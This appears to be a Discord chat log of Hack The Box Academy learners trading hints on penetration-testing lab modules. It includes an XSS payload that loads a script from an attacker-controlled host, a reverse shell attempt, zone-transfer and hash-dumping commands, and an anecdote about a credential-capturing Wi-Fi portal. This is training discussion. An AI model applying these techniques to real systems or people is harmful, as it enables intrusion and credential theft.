#modules
I see that on https there is a basic auth, but I can't run hydra because of an SSL error...
I already tried brute-forcing SMTP, RDP, FTP
to find subdomains?
MySQL blocks my host if I try to brute-force
Yes
try smtp with the username in email format
already tried
and use a common wordlist
ok so it's the wordlist that's the problem...
yeah, I found some subdomains like ns.inlanefreight.htb and I tried dig again but nothing happened
yes
thank you...
any hint?
I second this question.
You need to use subbrute, and then you'll get a set of subdomains to try with
I found 3 subs, none of them work:
dig AXFR @IP helpdesk.inlanefreight.htb
; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> AXFR @IP helpdesk.inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
There is a shorter domain that should work, did you let the command run for a bit?
yeah
thank you
It feels so much better with the VM, especially after I changed it to 50% @fathom pendant
Can anyone who used backbox or blackarch give their opinion on the distro?
no because it has nothing to do with modules
if you have only 500 cubes, and you need to pick one module from tier 3, which one would you choose?
ADCS
simple reason: ADCS is the hottest thing right now in pentesting AD networks
but training materials are sparse
over Kerberos attacks?
definitely
there's other training out there you can do for Kerberos stuff
adcs practice is hard to find
Hmm, I got your point, fair enough, ty
my disclaimer would be that I haven't finished the ADCS module yet
but it's a big reason I got excited for getting my free gold sub
free gold sub ?
found a bug, htb gave me gold sub for it
congrats bro , that's awesome
congrats, that's a major W (win)
disagree with this, many of the ESCs need to be chained with other Kerberos attacks in order to succeed
it's not a matter of what's priority to learn, but what's a better use of cubes
you can go elsewhere to learn the necessary Kerberos stuff, ADCS practice stuff is harder to find
I agree with that, but many of the Kerberos attack steps are not in depth because it's required knowledge, so if you're not already familiar with Kerberos stuff, it can be confusing
the ADCS module is probably better value, but it won't be as effective if Kerberos attacks are new to you
Reasonable disclaimer, I still wouldn't change it as my answer to the original question
but I'd agree that if someone had more cubes to spare, then Kerb attacks would be a good first one. I'm doing it now myself
fair enough
Module: Using the Metasploit Framework
Section: Encoders
Text: Shikata Ga Nai (SGN) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore. Far from it.
Can someone please re-word this? I can't comprehend its meaning in its current form.
It is so hard to detect, because it is not universally undetectable makes no sense to me.
it's been posted to #858470491676737536
sgn was very difficult to detect back then but now it's easily detected
Thanks that is a nice distillation.
if you want a slightly deeper how: it's basically perfect at making a payload not trigger static signatures, but sadly its own decoders get sigged instead.
So really, no matter how many iterations you'd do the decoders are always present and found
yes, because the last decoder on the stack will just get flagged by a competent AV
you could mix it with other more modern means but then it just brings up the question why not just rely on those other modern methods instead
yep evasion nowadays is not as simple as just an encoder anymore
also beating the static signature is literally only half the battle
only a quarter or less if we wanna be pedantic
It is a bit sad doing these modules knowing that the most basic EDR product would block literally everything I'm doing 
you gotta crawl before you can run
I need assistance on module Supply Chain Attacks: Dev-not so ready secrets
anyone has a moment?
why is the target disconnecting continuously and slow?
Enumerate the "flagDB" database and submit a flag as your answer.
Attacking Common Services - SQL.
I found mssqlsvc's password, but I can't seem to log in. Am I on the right path?
Anyone able to pop me a hint for DETECTING WINDOWS ATTACKS WITH SPLUNK - Detecting Ransomware please?
Modify the action-related part of the Splunk search of this section that detects excessive file overwrites so that it detects ransomware that delete the original files instead of overwriting them. Run this search against the "ransomware_excessive_delete_aleta" index and the "bro:smb_files:json" sourcetype. Enter the value of the "count" field as your answer.
I've modified the action-related part of the splunk search and changed the index to match that in the question however the count I am getting does not seem to be right.
Edit: Figured it out 
There is a tool called tplmap. It's a python script that automates Server Side Template Injections. When I use it, it returns this error:
module 'collections' has no attribute 'Mapping'
This error is due to the "importing from collections was deprecated and eventually removed in Python 3.10. The syntax in 3.10 is to import collections.abc instead."
Can you please help me edit the code so that it uses collections.abc instead of collections
try another authentication mode
Hi everyone! I'm stuck on the second question in the CrackMapExec Skills assessment. Could anyone provide a nudge?
I'm not sure if my CME is broken or if I'm going down the wrong path
I've been having all kinds of issues with nmap getting hung at near completion (usually > 90% complete) during the "Network enumeration with nmap" module. It doesn't seem to be tied to any certain flag or command, the pwnbox pings at around 3ms so shouldn't be related to any kind of lag. Any tips on anything I can do to make sure the scan completes?
It seems to be getting hung at "undergoing script scan"
trying to run the SocksOverRDP server.exe on the 2nd target machine but getting an error
RDP and SOCKS Tunneling with SocksOverRDP
PIVOTING, TUNNELING, AND PORT
The ACL Enumeration section's lab is near unresponsive.
I cannot enumerate if I don't get any output.
Any way we can get this fixed?
plugin not loaded on the client
Did you get the success message when loading the dll
I got the success message with client.dll
Why does PowerShell call it "Self-Membership" and BloodHound call it "AddSelf"???
I can't find anything linking the two. This is for ACL enumeration in AD labs.
Are you following the section exactly?
maybe I am missing something but I tried the section exactly
Did you skip over rdp to the middleman host?
don't get it
Then you skipped over something in the section
You're at point a. You need to go to point b. And then you can get to c through pivots
Where do I find a cross reference between BloodHound labels and actual ObjectAceTypes?
So there is no cross-reference?
Unsure if you've solved it already, but i also had challenges with this question. Did solve it and at least for me the hash values changed because i reset the Admin pwd, so had to restart and grab the original hash.
Good luck. Was a tough slog to finish the module but I learnt a lot.
I found this
Later on the same page it has this:
But there is no cross-reference between them. That's what I'm looking for.
This is still a good reference though:
https://www.thehacker.recipes/a-d/movement/dacl
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces the connection is pretty obvious
how does one dump an NTDS.dit? I don't get it, the password module just talks about using CME to do it, but isn't there another way to do it if you have the VSS file?
nvm I figured it out
Would modules, for example like Windows Fundamentals, be included if you just selected a job-path to complete? idk if I'm wording this right... xD If you just picked a job-path, and along the way of completing it, would you still get the individual credit/badge for the modules that make up the path itself? I'm like assuming yes but just wanted to make sure xD
If this is the wrong channel to ask I do apologize, I am new here
Most of the job paths already have some assumptions made that you have operating system fundamentals down so they can expand on their respective subject down the line
Each job-role path has a respective "pre-requisite" path that's recommended
tysm! It kinda seemed like common sense, but I just like to make sure by asking. I have the same issue IRL as well, and haven't been able to figure out why. I just... idk, I guess need confirmation coming from more than just my own mind xD
I intend to become certified as a pentester
Learn by doing, and fucking around
The academy module labs are great to fuck around with because they're an isolated environment
I truly love that. It's exactly what I've been doing, and it's very nice to hear another person say something like that
I'm a lil socially awkward so, like, I'm also not sure my thought process is correct
but that's exactly what I've been doing,
Step 1: if you don't get the answer to a module question - re-read the section, you likely overlooked something
I.e. the common pitfall that people make in the Linux Fundamentals module is not using ssh and connecting to the target
And wondering why their answer is wrong
Step 2: if you're sure a set of commands should work, do it Step by step until it breaks
Step 0: RTFM
Most of these modules were written by people that didn't have the grace of having a legal place to learn these things
So if they could learn from nothing. You can learn from something
I went from learning that red-teaming/pentesting/BBH could be a job/career in the first place, like at all, and knew right then and there it's what I wanted. I always kinda messed around with hacking throughout life, but, obviously, for selfish/the wrong reasons. But to learn that, like, bug bounty programs literally exist, or that pentesting for companies exists, it just truly aligned with myself. I've gone from, like, just kinda looking at YouTube vids and discovering HackTheBox, to running my own VMs (cuz at first I literally only had 1 pwnbox per 24 hrs), but once I learned that literally all the pwnbox is, is a VM essentially, and I could just run my own to practice all I want (I still sub'd to Academy of course though lol, with time), but then I started messing around (and yes, bricking) my own home systems, labs, etc. I've played with Kali, Parrot, I really like BlackArch Linux but just, I guess, don't have enough knowledge to nav through it? (none of the same CLI commands from Kali work on it), but then, with time, I also learned that it TRULY doesn't matter which OS I picked. I think I just wanted to look cool? Like, you can essentially create your own OS ezpz lemon squeezy in minutes
with just the Linux kernel essentially, I can wipe a machine, just slap on Linux, and from there install and use any of the tools I wanted. Like... I didn't literally NEED BlackArch, cuz it looked cool, cuz I'll literally never even use most of those 30000 tools
It's also easy to get trapped in the mindset of "I couldn't possibly be wrong, it's the module that's broken"
I've prolly wiped/re-installed systems like 20 times since the start lol
When in fact. It's a skill issue
And I will call out a skill issue, if I know for a fact, the intended command works
how can i turn off the slow mode? i like can't reply and send messages like i would like
Slow mode is on admins side not ours
Its enabled to stop people from spamming a bunch
It's 100% a skill issue always in my case. I just choose to not give up. If I really sit there long enough, and if I really sit there and figure out like, "okay I did this, this and this", like... so far, even if it took an all-nighter, I've been able to complete the tasks I've started
A lot of modules miss out on certain things that are crucial to getting the answer to some of the questions asked. It could be a simple one liner that is necessary and you failed to learn about at all.
Also a good method of asking questions here is:
Module Name & Section
What you're struggling with
What you tried
like right now I'm on the "oopsie" lab in the HTB labs,
the one prior gave me the most issues, but omg did it feel so good to finally complete it in the end, with the reverse (don't wanna put spoilers)
That's the thing, it's meant to lead you in the direction tbh. They lead you to a command that's almost like what you need, but not quite
This channel isn't for starting-point machines btw
oh I'm so sorry
I'm sorry, that's my fault
thx, I will look into it
This channel is for the learning modules in htb academy
You're good, just letting you know - if you need nudges there's a more appropriate place to ask
Also fwiw, walk-throughs can be a good teacher - if you're not just blindly following them
Question things, asking why, is how you improve
heard, ty. I completed the Linux Fundamentals module last night. I was kinda stuck or hesitant on what to start on from there? But like, I figure I should go and learn the things I don't already know, so I picked the Networking module. I figure it's a logical thing to learn allllllllll the basic fundamentals, even if they seem irrelevant at first. Cuz that's exactly what it was for me, like, "well I'm not trying to learn how to be a sysadmin, or create, run, and maintain a network, I just wanna be a hacker"
I spent almost 2 hours last night trying to see if I'm going crazy or doing something wrong while trying to do a password attack only to realize that you needed to wait 30 min, not only that the module told you to attack the wrong protocol
but I think it made sense too, like, in order to be the best version of what I'm going for, it makes sense to just know absolutely everything, and not just, oh, the hacker modules
Information Security Foundations Path is a good one, it's a pre-req to the pen tester one
^ty
It's a lesson in humility, don't just assume the question is telling you where to start
The pivoting module is similar
It's assuming you've read the section up to that point
Though pivoting module is very much a follow-along guide
Always scan the target first, even if given a bunch of info
yes it is not a "oh you missed something in the section" thing
just this convo alone with you guys really makes me feel very encouraged about going after this. I didn't have anyone IRL to talk to about it, and no mentor-type person to ask as well. So I just wanna say thank you guys for just being a cool community like this
Rule 1 of enumerating: treat it as if you didn't have the question to point you
I love how you guys aren't just flat out giving out the answers to the questions, but more forcing you to see what it is you're doing and try and figure it out
omg, tbh, it's no lie when you read "OSINT is almost like 90% of a successful campaign"
As long as you're not just seeking the answer, someone will help
truly doing all the research and info gathering you can on the target, like.
really really really really does help out so much
also for password cracking, I found out the hard way that, like,
Which is why earlier I stated that including what you've done helps narrow down what someone will suggest to try
essentially it's not like in the movies, if the password isn't IN THE WORDLIST you're using to "crack" the hash, it simply won't happen
Wait until you learn about masking :)
That takes AGES
you can run a cracker all day and overheat your machine all day, but so far I've experienced that, like, dude, if that pw simply isn't in the wordlist you're trying, it won't catch
Depending
If you have trouble with the Oracle TNS exercise in Footprinting because sqlplus cannot be installed with apt:
E: Unable to locate package oracle-instantclient-devel
E: Unable to locate package oracle-instantclient-sqlplus
installing it manually worked https://www.geeksforgeeks.org/how-to-install-sqlplus-on-linux/
Hashcat and John are the 2 major ones
is there a way to, like... idk, config the tool, like hashcat for example, or john, like. Let's say I throw one wordlist at it
but, is there a way to, like,
Occasionally you'll see Chickenman poke his head in here
(Chickenman as in the lead dev for hashcat btw)
idk... yes, there's 1k words in the wordlist, but is there a way to config it to be able to, like, use combinations of the passwords? Like if the wordlist I'm using contains all the colors, and then all the countries, individually, is there a way to set it or config it so that, like, it'll run through all of them individually,
but then start to COMBINE the words, like, blue, red, usa, india, and THEN, blueusa, redindia?
Not really? You'd need to generate that list yourself
ahhhh, ty
Iirc there's an attack or whatever mode but I'd have to rtfm for that
Also if you didn't catch on: rtfm, read the fancy manual
I'm sorry, I think I know what iirc means, but could I ask you to plz tell me the rtfm?
the pwnbox that comes with the website has a ton of wordlists.
Yes, and in Password Attacks, mutated section, you're instructed to create a wordlist using a ruleset
Btw that list is used throughout the rest of the module afaik
oh @sullen tusk when you do need to use wordlists in a module, a lot of the times the ones you are supposed to use if not specified will be on the upper right hand corner of the page in a resources button
^
If it's not there it's likely gonna be rockyou
But usually they'll tell you what list to use
14 million passwords in rockyou; got like 40 more lists with millions of passwords
no, yes, it does come with a good wordlist, I was referring to cracking my own wifi password with a Flipper and Marauder. Like, obviously I know my own wifi's password, I just wanted to make sure I had a lil methodology down. So like, essentially what it was is like, I would set it to record or sniff the traffic, then get the WAP, and like, deauth it to get the handshakes (I guess the wifi devboard simply isn't strong enough, but I literally couldn't FORCE any device off the network and capture the EAPOL when reconnecting). I like literally had to go around the house making everyone disconnect and reconnect to the wifi,
Wifi cracking is different from other bruteforce methods fwiw
then once I had the 4 EAPOLs, I took the pcap from Wireshark and converted it into the hash for hashcat, and then ran a bunch of different wordlists through it
it took my cheap $250 HP laptop 4 hrs and several pauses/restarts (because of temperature) just to get through the entire rockyou xD
¯\_(ツ)_/¯
but then later, I learned that what I COULD'VE done was use my actual real CPU, with like, a friggin graphics card, and use that,
but then also that's when I learned it literally DOESN'T matter if the pass itself wasn't already in the wordlist
it is damn near impossible to hack wpa3
many say to crack an egg ¯\_(ツ)_/¯
there's a 3?!?!?!?
wpa3 is just the version
-actual gasp-
Like wi-fi 6
no I know, but WPA2 is crazy difficult as is xD
yeah, the only way you're gonna hack WPA3 is by pointing a gun at the owner.
Or cat 6 cables
Impossible for just casual people
the evil portal one was fun as well. I ran it at work just to see if I config'd it correctly to work in public and at home (obviously, this is literally the ONLY time I used or will use it in public, cuz I had permission)
but just to see the looks on everyone's faces is priceless, like, "omg?? we have free wifi now?? all I gotta do is enter my gmail credentials??? bet!!"
aaaaaaaand, hit send, nothing happens xD
Yep
just any input is sent to my Flipper, obviously I stood right next to them and made them type, like, gibberish, but
Well not "nothing"
it's those lil moments like that that make it fun aswell
But academy will not teach you any type of attack like that btw
I mean, they hit send, and it just refreshes to the same page, meanwhile whatever they entered is sent to me
Were getting severely off-track now 
no no, that was just for funsies on the side, sometimes I get burnt out studying Academy
I'm sorry =/
I think that's twice now, I really am. I'll stop
All good just reigning it in before someone's help request gets drowned out
There's a #general chat btw
Read #welcome
The otherday I tried doing stuff i learned in HTB on some scammers I got contacted by from singapore
You should refrain from such things. They are illegal and violate the rules of HTB
This is true, but don't think that a bigger wordlist is always better, we have smarter attacks these days than just adding more and more words
okay. None of it was hacking, it was just OSINT stuff, btw.
ehhhhh, we'll see about that
This man is cookin
a lot of people are very confident that their preferred AP vendor is going to implement WPA3 correctly, I'm a little less so
I still need to join your discord btw, I forgot last time
haha
wait the vendors implement the WPA3
Vendors doing things incorrectly? That never happens
haha ikr
I thought wpa3 is like a program that's executed by the system embedded onto the hardware
I have a feeling we'll see plenty of "oops the field size is too small and all our customers have been using easily crackable WPA3 my baaaaad"
you know, widely distributed by the government/FCC
the protocol, which is based around the dragonfly protocol iirc
My wifi password is one334 good luck cracking it
relied on the discrete log problem for its hardness
which works if implemented properly
Much like RSA and prime factors
right
but much like weak RSA you can find in some CTFs and such
it can be done wrong with only small variations
too short, minimum of 8 for WPA2
wait @paper gust you're the guy MarcieLee said created hashcat, that's pretty cool
been using that thing all week
well, i didn't create it, i just work on it as a part of the team
^ he just hangs out here
This isn't the channel to discuss bug bounties (in general)
Read #welcome
I summoned the chicken
haha
Ooh my bad thanks for help!
Anyway we've hard derailed the channel (as usual for a Tuesday morning)
haha per usual
I found myself duckduckgoing for clues to answers all the time but that's stopped as I've gotten to the attacking parts
Asking here is good for a quick sanity check
Could someone please tell me what I might be doing wrong with the "Tapping Into ETW" module? (https://academy.hackthebox.com/module/216/section/2325)
I replicated all the steps, have SilkETW.exe running as Administrator, did reset the VM, but I can't find the log entries for both examples in the etw.json
Wdym "reset the vm"
Actually clicked "restart" from within the vm?
I restarted the target windows vm via the web interface to get a fresh instance
Resetting from the web interface starts a new instance
So it didn't capture anything since its new
Hello, in Attacking Common Services - Easy we are supposed to brute force the user fxxx's password. I have been struggling with this for quite a few hours using the rockyou list. MySQL is blocked after around 100 passwds, FTP doesn't provide anything, RDP either, SMB disagrees. Is there anything I am missing?
I restarted the VM and then did all the steps again
Ah
That bit was unclear in how you listed the steps
You listed it as though resetting the vm was a step
for the first example I see the cmd.exe under the spoolsv.exe but I can't find the entry if I search for the PID of the spoolsv.exe
(Which sounds odd to me but I haven't done these modules)
hmm ok
Are you looking at the spoolsv.exe from the context of the example: or from looking at it in the instance
Bc very likely. Those will be different
I follow the steps from the example and search for the PID I used from process hacker (not the one from the screenshots)
Footprinting Lab - Medium. I need some help. I have logged into SQL Server Management Studio, I have expanded all available menus but I can't find anything useful. plz help
you can't even disassociate so it's probably not possible to capture a 4-way.
Check out the ||Explorer tab -> Expand Databases, you can also issue SQL queries, look around more||
i have expanded the DB's like 10 times. lol
A brief introduction to SQL Server Management Studio, for beginners. Covers the main user interface windows, and some basic tasks.
allright, thanks . let me have a crack at it
this video is the shiz niz. after watching it ive got the answer. MY GHHHAAAAAAADDDDD
Oh, I know
You're welcome
Hi, I'm trying to figure out the distinctions between using wget, get, and curl. Are some of them only for transferring one-way, like only from the target to our host?
It's in the getting Started module in the Pentester job path
I cant remember, was it the oracle db?
have you tried attacking smtp?
@lusty thicket SMTP provided the login fxxx@xxx.
Hi everyone, any tips for the last question in "STACK-BASED BUFFER OVERFLOWS ON LINUX X86" please? I
hey guys, I have a problem when fuzzing through proxychains.
||proxychains ffuf -w directory-list-2.3-small.txt:FUZZ -u http://IP:PORT/FUZZ||
can someone give me a hint what I'm missing please?
can you give me a hint of the module and section?
it's on Dante lab ...
but going through the modules I didn't find anything that points out that I need an extra "touch" when doing proxychains...
there's a -x in the help menu (ffuf) that explain about using socks5://127.0.0.1:1080 but if I'm using proxychains isn't it doing it by itself?
you should get into the ligolo gang
what is it?
pivoting tool that uses layer 3 instead of layer 5 for the tunnel
making everything better
and now it has been updated
you can have X tunnels at the same time
so if I understand you correctly, the reason is that the -x flag works on layer 3, so that's why it happened over proxychains?!
lol, then no...
I'm trying to figure out why both commands do the same thing.
guess I need a bit more research ...
hi everyone, I'm stuck on the module "broken authentication".
in the section "Predictable Reset Token", there is an md5 hash that's supposed to be generated based on the epoch time in milliseconds, but i can't seem to find a valid token for the admin, after brute-forcing the +1/-1 seconds.
anyone knows why that could be ?
found the problem, i had to add the username in front !
usually having a username helps :^)
Module :Windows Privilege Escalation
Windows Built-in Groups
Hello, I have an issue with the command : $key = Get-BootKey -SystemHivePath .\SYSTEM
I get this error : Get-BootKey : Requested registry access is not allowed.
I don't know what to do, I did not find any useful information online
Thx
- Requested Registry Access is not allowed = you don't have perms to view it :) hth
I don't understand, I did everything that was in the module
Do you have any hint ?
@lusty thicket The pass obtained doesn't satisfy MySQL much: ERROR 1045 (28000): Access denied for user 'fxx@xx'@'10.10.15.17' (using password: YES). It looks like a dead end as FTP doesn't appreciate it much either.
Are you running this on the copy of the SYSTEM hive you made?
and you made the copies how?
mysql -u user -ppass -h ip
with diskshadow, i shadow the C: to E:. Actually the SYSTEM file was already in the folder. How do I make one ?
I thought so. If you want to use DSInternals on that copy you need to specify its path with E:\SYSTEM iirc. I prefer reg save, it's more straightforward
I do use its path. It does not work.
@lusty thicket yes ... same result giving -ppass or -p and pass after, and idem after resetting
weird, just use reg save then, I didn't spend much time on that technique XD. There are like 4 ways to copy that, reg save works well.
try leaving out the domain
@lusty thicket .... better after removing the domain name
How do you copy on your machine ?
copy on my machine? You could use reg save to create the copies of the system and sam registry and use dsinternals to extract or transfer over to your machines and extract with secretsdump.
Yes on my machine, I use xfreerdp and I can not get the files to work them on my machine
xfreerdp has a /drive: option
Review the file transfer module and xfreerdp has a /drive option
You could also use mimikatz, but you should really review the file transfer module.
^ file transfer is invaluable
I had no idea I already did your first mention but I am getting wrong hashes
I even got the 2 hashes of Administrator
I checked it with impacket
First one hash belongs to 172.16.19.3 (windows)
Second Administrator hash belongs to 172.16.19.19 which is linux
But none of them worked
I tried --sam, --lsa, --ntds with the hash of 172.16.19.3 but couldn't find a ws01 administrator hash, I tried dumping hashes using secretsdump with the hash of the ws01$ account and it didn't work
I know --ntds doesn't make sense, but I am trying what I know it is third day...
Can you put me in the context, which module is this and what are you trying to do
You can dm me as well
It is the ADCS module which is about certificates in AD, and the ESC11 lab
Didn't do that module
I'm on module Password Attacks - Network Services, after mounting an NFS share I cannot access it, is that part of the lab or did I miss something
su to root and look around
i forget the exact options you need to set to not have this happen
yep, even with root, this was my mount command: sudo mount -t nfs 10.129.141.192:/JNFS/ ./nfs/ -o nolock
yes and I su to root but it still says no permission
Hello still on
Windows Privilege Escalation
Windows Built-in Groups
I can not crack the hash...
I tried with john and hashcat
I can not pass the hash either
@acoustic owl could we go in Dms ?
https://academy.hackthebox.com/module/67/section/640. I have tried with searching "password" in C:\Users. But the password from the document's file is not accepted
Could anyone help me with this ?
Hi everyone, I was wondering if someone could help me in PM for the Assembly skill assessment. I've done the xor loop to decode the shellcode, then once I've got the decoded shellcode I can't use it on the target to get the flag
@wheat garden could you help me with this ?
Check the module again to see exactly how to search correctly.
By the way, take another look at the #rules . Simply writing to people via dm or pinging them for no reason is not allowed.
can somebody help me
Is this the question?
Leverage SeBackupPrivilege rights and obtain the flag located at c:\Users\Administrator\Desktop\SeBackupPrivilege\flag.txt
yes and i got the reg save on my machine
If so, you do not need to crack a hash or access the system via PtH
how can I do ?
The module explains exactly what you have to do
thx you
you're still stuck here? have you tried to dump regs of ws01?
First, I can't even find a way to log in to ws01 to dump hashes. I will have to have either a password or hash (pass-the-hash login), right? If I follow the module I am getting hashes which belong only to the "lab-dc" hostname, not "ws01". I tried to dump regs of Administrator (lab-dc) but it was useless
I am on the introduction
you used secretsdump on dc, use the domain admin's hash to access ws01
Yes, but when I type hostname command it was "lab-dc"
I tried to dump regs but still not ws01 and lab is not accepting
what creds did you use to dump ws01
Blwasp ?
please avoid straight directions of solving an assessment
everything you need to solve anything is within the module's sections
That creds written in lab, I hope it is not spoiler
you have DA, why are you using other creds 
Export list for 10.129.138.4:
/JNFS (everyone)
I cannot access even with root
help guys :((
su to root and look in the share
i took a tangent myself on this one (not sure if it's intended process though).
I assume you can get onto the DC given you've answered the first question. You can use certain native commands to roll the Admin DC creds, which you can then use with secretsdump (ala https://wadcoms.github.io/wadcoms/Impacket-SecretsDump/), adjust IP accordingly.
I can unlock a tier 3 module, Kerberos vs ADCS?
I'm thinking ADCS. Kerberos attacks has content you could find on the internet, but not much well-explained ADCS content around, let alone all the ESCs in the SpecterOps whitepaper
how well versed are you in kerb? If you understand it well enough.. I did find ADCS good and as mentioned above. not as much ADCS stuff out there compared to Kerb attacks
with that said, my brain did melt a fair bit in ADCS.. somehow made it through.. def helps going in with a decent understanding of kerb and AD
I'm definitely gonna come back for this Kerberos attacks when I get the cubes
Calm down. HTB academy has one of the best support teams I've seen
one of the best
If it is a technical problem, only Support can help you. They usually don't read here in Discord.
Contact support via the green bubble
Need to speak to a person? Learn how to reach our support via HTB Labs.
take it up with them, nothing we can do here
I'm sorry to hear that, but there's nothing we can do for you here.
Support is also available via email.
We can't do anything for you here in Discord.
thanks for the answers
will go for the adcs one
i will get cubes for the kerberos later on
May I DM please? I know I might be annoying for you, but this is the last time. I want to show one thing that might be a spoiler in here
any one have a second to try an attempt to explain something within information gathering - web edition?
hey everyone, I'm struggling with the last question in the NTLM Relay Attacks module, lesson "NTLM Cross-protocol Relay Attacks": Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.
i need some modules can u help
I can try, what are you struggling with?
yes
How would you determine in this if there was a vhost?
and further down the line, there's a wordlist that's used to enumerate possible vhosts... are those names only used for vhosts? or can those be actual servers as well?
In PIVOTING, TUNNELING, AND PORT FORWARDING, and section SOCKS5 Tunneling with Chisel. I can't run chisel on target host I get this error: ./chisel
./chisel: error while loading shared libraries: libgo.so.22: cannot open shared object file: No such file or directory
Is there a way to solve this? Or did I understand something wrong in the section
i don't understand what you mean.. it's a wordlist
you can fuzz the host header and analyze which request serves different content
yeah so what I mean is that wordlist with vhost names within it, can those names only be used for a vhost, or could they be used for an actual server
?
compile it statically
a virtual host could allow a physical server to act as if it were multiple servers
to the best of my knowledge
think of it as a virtual server
Hello again,
In Windows Privilege Escalation
DnsAdmins
I leverage membership in the DnsAdmins group to escalate privileges but I can not access to the flag
in windows OS you need to log out and login again to get changes in groups reflected
I did it. I disconnected and connected again, I don't know how to do it another way
it's okay, I succeeded in signing out
Thanks!
you could also use a reverse shell payload too for the dll, just figured that works too.
Can I not do the starting point exercises without connecting to the pwnbox in the LAB? or do I have to use the 2h I got?
There's a starting-point vpn
@fathom pendant
yes I tried to use it , I typed open starting_point_TTT.ovpn on VM
it only opened a window
with a lot of text
same
anyone here done the common services module?
need help at the SQL Databases section
NVM
it was a syntax error
In the SQL Injection Fundamentals skill assessment, is it possible to obtain a reverse shell? I have command execution, but when I try to establish a reverse shell the website just hangs which leads me to believe a firewall might be in the way?
In the Attacking NTDS.dit section of Password Attacks, HTB mentions that if we are using xfreerdp 'all we must do is copy and paste into the RDP session we have established.' I googled a bit but could not really figure out how to make this work, so I ended up using my notes from the file transfer section to answer the questions. I am interested in learning this method though, if anyone could explain?
Does somebody know if the box is broken?
Still can't connect to it.
Been stuck for 3 days now.
Could you connect to the box? If so, how did you do it?
after some suffering i did
its sooooo laggy
I just get connection timeout all day
But mssqlclient.py y -p port user@ip is right?
hello, i'm doing the brute forcing module (service authentication brute forcing). it takes a lot of time to brute force and i have this
yeah but are u trying w the first user?
if yes then wrap the password in quotes
for the special characters
wait how do you mean, i get prompted like this:
Then still in quotes?
what did you use?
Can anyone give a nudge for Predictable Reset token in the Broken Auth section? I cannot figure it out to save my life. I have modified the script to convert to epoch time, changed the interval from -1 to +1 and even made sure htbadmin was prepended and the times were synced with the server. I have skipped this section multiple times and I really need a nudge so I can put lessons learned in my notes and move on.
+/- 1 second = 2000 milliseconds
Hey guys, what do you recommend between bloodhound-ce and old bloodhound? I feel like the ce version is more modern and fluid, but seeing the AD Module screenshots, I've got the feeling it also has fewer features
sure but can only get back to you in a bit
Unfortunately i get
"Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication."
Then i just get "Login failed for user '.htbdbuser'."
:/
Can anyone help me please with the crackmapexec skills assessments, I'm struggling with the 2 last questions Ccache share and DC01
I'm on the Digital Forensics skills assessment, but every time I try to launch a hunt for Windows.Memory.Acquisition, it keeps saying "While resolving github release Velocidex/WinPmem: Get "https://api.github.com/repos/Velocidex/WinPmem/releases/latest": dial tcp: lookup api.github.com: no such host." what's going on?
hello, i'm doing the brute forcing module (service authentication brute forcing). it takes a lot of time to brute force and i have this
Can anyone help with the module "Active Directory BloodHound" section "BloodHound for BlueTeams"; the first question has me stumped. Tried multiple angles here, and I still get wrong answer. No clue what I'm doing wrong.
okay nvm....still working out how that number got generated.
how do u authenticate to that account in the nessus skills assessment? im confused
https://ip:nessusport
Anyone?
thanks
for anyone curious, i managed to pop windows section for the dnsadmin group
what worked is running gpupdate /force then logout/login
may have to try a few times but it will work
i got the answer right but dont know how. how do i actually tell with concrete certainty the number of zones on the target name server? i got like 15+ items here
hint: localhost
the NS one is well the nameserver
so server and address, thats how i get the 2?
yep (basically)
because when i use just inlanefreight.htb it responds back with way more
and for the question it specifies the nameserver only ohhh
it does not mean that's all the zones
you're missing another one
(localhost got you thinking of the ns one, look for another one there)
what do you mean?
nslookup -query=AXFR ns.inlanefreight.htb (IP)
got me the answer of those 2 zones
i'm staring at one of your screenshot
and there's two localhost ones
ns and another
internal.inlanefreight.htb?
are you asking or telling
thats the one with localhost ip
but thats not a zone for ns.inlanefreight.htb
so then are all those other name and address combos zones too for the provided IP?
they can be but they don't necessarily have to be
Read the DNS topic carefully again.
For those interested, I used the latest SharpHound collector, not the one present in the HTB boxes, and data is much better now
thank you, feel a bit lost on this based on what HTB academy provided (not to be that guy)
DNS can also be a bit tricky tbh
Read the pages on Cloudflare. DNS is actually explained quite well there
dig
think of them as resource records for that zone
im getting this error:
```
$ sudo php -S 0.0.0.0:80
[Tue Jan 9 21:07:18 2024] Failed to listen on 0.0.0.0:80 (reason: Address already in use)
```
running sudo netstat -plnt gives the following
```
$ sudo netstat -plnt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1/init
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 4305/python2.7
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3703/sshd: /usr/sbi
...
```
if i try to kill the python process with `kill -9 4305` it just restarts again. what should i do? i tried listening on the server on port 81 instead but i don't think that works for this module.
i also went to /etc/systemd/system to see if there was a service restarting it but there is no mention of "python" in the folder
port 80 on the pwnbox is what's serving you the vm to the browser
the module says port 80... pretty weird for them to do that if you literally cant use it
this is in the session hijacking part of the xss module, where we attempt to get <script src="http://OUR_IP/script.js"></script> to run on the server side, would running with port 8080 still work for that?
you'd need to add the port after OUR_IP
(OUR_IP:port)
Understanding Log Sources & Investigating with Splunk
Using Splunk Applications
Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local
I found the command || sysmon process=net.exe (CommandLine="net view") | stats count by Computer,CommandLine || but it's not really related to the question I think I don't understand the question correctly
I'm stuck on the footprinting easy lab, idk what to do, any advice
enumerate
find open ports: figure out what you can do with those
scan both tcp & udp
read @fathom pendant's bio
on the windows privilege escalation module for the server_admin portion, are you supposed to crack the administrator's password hash?
Have any of you guys gone through all the Fundamental modules despite already working in the industry? I am just doing it right now, refreshing some knowledge and making sure that I know the basics. Curious if someone else has done it.
ive gotten through most of it
Yeah i did it but their linux module sucks.
can anyone help me with ATTACKING COMMON APPLICATIONS - PRTG - Attack the PRTG target and gain remote code execution. Submit the contents of the flag.txt file on the administrator Desktop?
In starting the point
How do I submit the root flag??
#starting-point is its own section
but there's a text field in it
usually the last question of a machine
what is "nr"
